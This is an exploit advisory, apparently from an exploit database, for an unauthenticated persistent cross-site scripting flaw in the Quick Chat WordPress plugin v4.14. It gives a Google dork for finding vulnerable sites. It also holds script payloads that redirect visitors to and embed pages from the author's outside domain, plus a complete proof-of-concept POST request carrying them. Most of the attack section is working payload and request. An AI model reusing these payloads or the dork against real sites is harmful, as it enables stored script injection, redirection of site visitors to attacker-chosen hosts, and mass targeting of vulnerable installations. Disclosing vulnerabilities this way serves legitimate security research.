[+] :: Exploit Title: Quick Chat plugin v4.14 - Unauthenticated Persistent XSS [+] :: Google Dork: inurl:/wp-content/plugins/quick-chat/ [+] :: Date: 2020-10-06 [+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ] [+] :: Vendor: Marko Martinović [ http://www.techytalk.info ] [+] :: Software Version: 4.14 [+] :: Software Link: https://wordpress.org/plugins/quick-chat/ [+] :: Tested on: Kali Linux [+] :: CVE: [+] :: CWE: CWE-79 [i] :: Info: An Unauthenticated Persistent XSS vulnerability was discovered in the Quick Chat plugin v4.14 for WordPress. Also was discovered an Authenticated Persistent XSS vulnerability on the Quick Chat options page in the admin dashboard (/wp-admin/options-general.php?page=quick-chat/quick-chat.php), vulnerable fields: «Chat name prefix for guest users», «Advertisement code for your AdSense». [$] :: Payloads: <!-->"><script>console.log(`Done!`);location=`https://ex-mi.ru/`;</script>"><embed src=//ex-mi.ru/payload/xfsii.html> <!-->"><!--><embed src=//ex-mi.ru> [!] :: PoC (Burp Suite): POST /wp-admin/admin-ajax.php HTTP/1.1 Host: www.techytalk.info Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 507 Referer: http://www.techytalk.info/wordpress/quick-chat/ Cookie: quick_chat_alias=%3C!--%3E%22%3E%3Cscript%3Econsole.log(%60Done!%60)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%2F%60%3B%3C%2Fscript%3E%22%3E%3Cembed%20src%3D%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E; action=quick-chat-ajax-username-check&username_check=%3C!--%3E%22%3E%3Cscript%3Econsole.log(%60Done!%60)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%2F%60%3B%3C%2Fscript%3E%22%3E%3Cembed%20src%3D%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E [@] :: Contacts: Website: ex-mi.ru Telegram: @ex_mi GitHub: @ex-mi Medium: @ex-mi